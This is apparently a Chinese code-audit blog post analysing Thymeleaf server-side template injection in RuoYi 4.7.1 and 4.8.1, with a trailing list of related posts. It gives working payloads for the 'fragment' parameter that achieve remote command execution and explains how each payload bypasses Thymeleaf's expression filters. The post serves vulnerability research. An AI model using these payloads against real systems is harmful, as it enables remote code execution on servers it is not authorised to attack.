【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析

目录

[V 4.7.1](#V 4.7.1)

[V 4.8.1](#V 4.8.1)


V 4.7.1

用的是3.0.12的Thymeleaf依赖

该版本对新建类有一些限制

https://github.com/thymeleaf/thymeleaf/issues/809

这三个路由都可以从fragment处打入thymeleaf ssti

打入payload:

复制代码
fragment=${T (java.lang.Runtime).getRuntime().exec("calc")}

来分析下为什么要这么构造payload:

3.0.12的Thymeleaf要求不能containsSpELInstantiationOrStatic

作用是 检测一个 SpEL表达式中是否包含对象实例化(如 new SomeClass(...))或静态方法调用(如 T(SomeClass).method())。

首先是把独立的new给ban了,也不允许出现T(xxx)

可以加个空格,用T (xxx)来进行绕过

V 4.8.1

用的是3.0.15的Thymeleaf依赖

来看下区别

用于检测字符串中是否存在以 $、*、#、@ 或 ~ 开头、后跟空白字符或者{,如果以该格式,则不允许

可以这么绕过

复制代码
|$${new.java.lang.ProcessBuilder('calc').start()}|

等效于

复制代码
'$' + ${new.java.lang.ProcessBuilder('calc').start()}

打入payload:

复制代码
fragment=|$${new.java.lang.ProcessBuilder('calc').start()}|

或者

复制代码
fragment=|$${''.getClass().forName('org.'+'springframework.expression.spel.standard.SpelExpressionParser').newInstance().parseExpression("''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')").getValue()}|
相关推荐
木风小助理几秒前
JavaAtomicInteger底层实现深度解析
java
BD_Marathon6 分钟前
搭建MyBatis框架之创建MyBatis的映射文件(五)
java·数据库·mybatis
一只叫煤球的猫7 分钟前
为什么Java里面,Service 层不直接返回 Result 对象?
java·spring boot·面试
洛阳泰山8 分钟前
智能体项目MaxKB4J - 本地部署与开发完整指南
java·agent·工作流·rag·智能体·maxkb
Solar202513 分钟前
机械制造业TOB企业获客软件选型指南:从挑战到解决方案的深度解析
java·大数据·服务器·架构·云计算
星火开发设计29 分钟前
C++ stack 全面解析与实战指南
java·数据结构·c++·学习·rpc··知识
宋情写34 分钟前
JavaAI06-SpringAI
java·人工智能
Hello.Reader1 小时前
Flink Avro Format Java / PyFlink 读写、Schema 细节与坑点总结
java·python·flink
人道领域1 小时前
【零基础学java】(反射)
java·开发语言
C雨后彩虹1 小时前
书籍叠放问题
java·数据结构·算法·华为·面试